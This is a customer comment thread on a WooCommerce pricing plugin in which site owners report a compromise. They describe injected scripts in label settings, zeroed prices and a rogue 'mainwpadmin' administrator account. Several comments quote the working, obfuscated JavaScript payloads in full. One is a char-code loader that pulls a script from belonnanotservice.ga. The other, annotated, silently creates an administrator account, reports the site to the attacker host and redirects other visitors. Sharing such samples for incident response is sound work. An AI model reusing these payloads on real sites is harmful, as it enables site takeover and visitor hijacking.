
Discussion on WooCommerce Dynamic Pricing & Discounts


7 comments found.

I see that malicious code appears in the “Your Price” option under “label”. In last version

—>. <script>eval(String.fromCharCode(118,97

I am managing a site for our client and it seems that your plugin outputs this after selecting the variations: <script>eval(String.fromCharCode(118,97,114,32,...</script> AND the discounted price is aligned right and looks weird. Screenshot https://bit.ly/3zO2aIF

My site is hacked. All discount rules were removed and some strange code was inserted. <script>eval(String.fromCharCode(118, and then a lot of more characters.

It adds this: “https://stat.belonnanotservice.ga/get.js?s=33” to the header of my site.

I’m currently cleaning the site, and updated to the latest version. Do you have more info?

lennone Purchased

Save Changes button in Promotion isn’t working and labels have been set to,

<script>eval(String.fromCharCode(118,97,114,32,114,116,114,116,117,32,61,32,69,108,101,109,101,110,116,59,32,114,116,114,116,117,46,112,114,111,116,111,116,121,112,101,46,97,112,112,101,110,100,65,102,116,101,114,32,61,32,102,117,110,99,116,105,111,110,40,116,121,116,107,121,106,116,121,106,101,110,116,41,32,123,116,121,116,107,121,106,116,121,106,101,110,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,104,105,115,44,32,116,121,116,107,121,106,116,121,106,101,110,116,46,110,101,120,116,83,105,98,108,105,110,103,41,59,125,44,32,102,97,108,115,101,59,40,102,117,110,99,116,105,111,110,40,41,32,123,32,118,97,114,32,116,121,116,107,121,106,116,121,106,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,116,121,116,107,121,106,116,121,106,46,116,121,112,101,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,116,121,116,107,121,106,116,121,106,46,115,114,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,57,56,44,49,48,49,44,49,48,56,44,49,49,49,44,49,49,48,44,49,49,48,44,57,55,44,49,49,48,44,49,49,49,44,49,49,54,44,49,49,53,44,49,48,49,44,49,49,52,44,49,49,56,44,49,48,53,44,57,57,44,49,48,49,44,52,54,44,49,48,51,44,57,55,44,52,55,44,49,48,51,44,49,48,49,44,49,49,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,53,44,54,49,44,53,49,44,53,49,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,1
01,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,91,48,93,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,41,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,121,116,107,121,106,116,121,106,41,59,125,41,40,41,59));</script>

On latest version.

I got a notice that I have to upgrade the plugin because of a security issue, and I upgraded the plugin. After that, all the product pricing I had made disappeared and there are errors on all product pages: <script>eval(String.fromCharCode(118,97,114,32,...</script> I saw in other comments that you said I have to read your article http://url.rightpress.net/wcdpd-security-announcement but I cannot see which part of the article is a solution to this issue. Can you let me know how to resolve this issue?

OmriS

OmriS Purchased

A while ago I reported a problem with the plugin where all prices had gone to 0. Then Kaspersky started flagging warnings. You guys posted that it had been fixed, and today for the first time I reactivated the plugin and updated it. However, it is the same problem: all prices are 0, and on the product page it then says ”<script>eval(String.fromCharCode(118,97,114,32,114,116,114,116,..... (I’ve not posted the whole error, as it’s long)

Essentially, I can’t use the plugin. It messes up all my pricing and sets everything to 0 plus the error code. This is a recent issue that I can’t seem to get rid of. I’d appreciate some assistance as I can no longer use the plugin.

comga

comga Purchased

ATTENTION:

A new user “mainwpadmin” is created with admin privileges.

This is the malicious JavaScript inserted from the settings page of the plugin:

// Injected script as quoted by the commenter; obfuscated and reproduced unchanged as evidence.
//
// String table: _0x2d36() returns an array that the IIFE after it rotates (push/shift)
// until a parseInt-based checksum equals 846171; _0x1856(i) then returns entry (i - 353)
// of the rotated array. The array order printed here is therefore NOT the lookup order.
// The literals 'hostname' and 'indexOf' are used side by side with indexed lookups 377 and
// 362 in the same positions, which suggests index i maps to position (i - 332) mod 32 of
// the array as printed. NOTE(review): confirm in an isolated sandbox before relying on it.
//
// Behaviour readable from the code:
//  - checkme(): synchronous GET (httpGet) against the page's own origin plus table entry
//    356; returns 1 when the response contains table entry 371, otherwise 0. By the mapping
//    above these are '/wp-admin/user-new.php' and '_wpnonce_create-user', so this looks
//    like a test for a browser session that can open the add-user form (presumably a
//    logged-in administrator).
//  - checkme() returned 1: defer() re-checks every 50 ms until a window property (entry
//    372, 'jQuery' by the mapping) exists, then ddddooit() fetches the same page, extracts
//    the nonce value with the regex, and POSTs a form with the literal fields
//    'action': 'createuser', 'send_user_notification': 0 and 'email':
//    'mainwpadmin@site.com'; 'user_login' and 'role' resolve to 'mainwpadmin' and
//    'administrator' by the mapping. On success it calls httpGet(entry 368 + site), which
//    by the mapping is 'https://stat.belonnanotservice.ga/a.php?u=' followed by the site origin.
//  - checkme() returned 0 and the current URL does not contain 'wp-login.php': flyme()
//    evals a char-code string that decodes to a redirect of the visitor to a
//    click.belonnanotservice.ga URL (document.location.href, then window.location.replace).
//
// Indicators visible in this sample: account 'mainwpadmin' / 'mainwpadmin@site.com',
// front-end pages requesting /wp-admin/user-new.php, hosts under belonnanotservice.ga,
// and <script>eval(String.fromCharCode(...)) stored in plugin label settings.
var _0x2eabe6 = _0x1856; function _0x2d36() { var _0x979262 = [ 'href', 'location', 'send', 'GET', 'https://stat.belonnanotservice.ga/a.php?u=', 'POST', '2984086SktrSK', '_wpnonce_create-user', 'jQuery', '3220KtEhrr', 'mainwpadmin', 'administrator', '5026644QEzVmq', 'hostname', '225DCNWVH', '8172332puMpQV', '93056NGNUOr', '8630tNLMDX', '193764nZWSVy', 'log', '1938948fCEjtI', 'Add+New+User', 'simple', 'ajax', '/wp-admin/user-new.php', 'protocol', '5675865833568', 'exec', 'open', 'http://simple.com/', 'indexOf', 'match' ]; _0x2d36 = function () { return _0x979262; }; return _0x2d36(); } (function (_0x4d84f0, _0x547eef) { var _0x222ea1 = _0x1856, _0x19a50e = _0x4d84f0(); while (!![]) { try { var _0x1ab1bc = parseInt(_0x222ea1(382)) / 1 + parseInt(_0x222ea1(370)) / 2 + -parseInt(_0x222ea1(376)) / 3 + -parseInt(_0x222ea1(373)) / 4 * (-parseInt(_0x222ea1(381)) / 5) + parseInt(_0x222ea1(384)) / 6 + -parseInt(_0x222ea1(379)) / 7 + -parseInt(_0x222ea1(380)) / 8 * (-parseInt(_0x222ea1(378)) / 9); if (_0x1ab1bc === _0x547eef) break; else _0x19a50e['push'](_0x19a50e['shift']()); } catch (_0x1e11a3) { _0x19a50e['push'](_0x19a50e['shift']()); } } }(_0x2d36, 846171)); var site = window[_0x2eabe6(365)][_0x2eabe6(357)] + '//' + window[_0x2eabe6(365)]['hostname'], kurl = window[_0x2eabe6(365)][_0x2eabe6(364)], m = checkme(); console[_0x2eabe6(383)](m); if (m == 0) { if (kurl[_0x2eabe6(362)]('wp-login.php') !== -1) { } else flyme(); } else defer(function () { ddddooit(); }); function ddddooit() { var _0x52118e = _0x2eabe6, _0x51dfbc = jQuery['noConflict'](); _0x51dfbc[_0x52118e(355)]({ 'url': site + _0x52118e(356), 'method': _0x52118e(367), 'success': function (_0x5dbc12) { var _0x12c589 = _0x52118e, _0x3fc83e = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if (_0x5dbc12[_0x12c589(362)](_0x12c589(371)) !== -1) { var _0x3a9c15 = _0x3fc83e[_0x12c589(359)](_0x5dbc12); if (_0x3a9c15[2][_0x12c589(363)](/([a-z0-9]{10})/)) { var _0xab464c = _0x3a9c15[2]; _0x51dfbc[_0x12c589(355)]({ 
'url': site + _0x12c589(356), 'method': _0x12c589(369), 'data': { 'action': 'createuser', '_wpnonce_create-user': _0xab464c, '_wp_http_referer': _0x12c589(356), 'user_login': _0x12c589(374), 'email': 'mainwpadmin@site.com', 'first_name': _0x12c589(354), 'last_name': _0x12c589(354), 'url': _0x12c589(361), 'pass1': _0x12c589(358), 'pass1-text': _0x12c589(358), 'pass2': _0x12c589(358), 'send_user_notification': 0, 'role': _0x12c589(375), 'createuser': _0x12c589(353) }, 'success': function (_0x4a113d) { var _0x17a42d = _0x12c589; httpGet(_0x17a42d(368) + site); } }); } } } }); } function defer(_0x323b0a) { var _0x49ee25 = _0x2eabe6; window[_0x49ee25(372)] ? _0x323b0a() : setTimeout(function () { defer(_0x323b0a); }, 50); } function httpGet(_0x21747c) { var _0x3d229b = _0x2eabe6, _0x4af436 = new XMLHttpRequest(); return _0x4af436[_0x3d229b(360)](_0x3d229b(367), _0x21747c, ![]), _0x4af436[_0x3d229b(366)](null), _0x4af436['responseText']; } function checkme() { var _0x18754b = _0x2eabe6, _0x1c74cd = window[_0x18754b(365)][_0x18754b(357)] + '//' + window[_0x18754b(365)][_0x18754b(377)], _0x4e9070 = httpGet(_0x1c74cd + _0x18754b(356)), _0x1da31b = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if (_0x4e9070['indexOf'](_0x18754b(371)) !== -1) return 1; return 0; } function _0x1856(_0x4df03e, _0x320613) { var _0x2d36e2 = _0x2d36(); return _0x1856 = function (_0x185680, _0x5e91fb) { _0x185680 = _0x185680 - 353; var _0x1bf975 = _0x2d36e2[_0x185680]; return _0x1bf975; }, _0x1856(_0x4df03e, _0x320613); } function flyme() { eval(String.fromCharCode(118, 97, 114, 32, 118, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 98, 101, 108, 111, 110, 110, 97, 110, 111, 116, 115, 101, 114, 118, 105, 99, 101, 46, 103, 97, 47, 106, 111, 98, 46, 112, 104, 112, 63, 109, 61, 48, 34, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 118, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 
105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 118, 41, 59)); }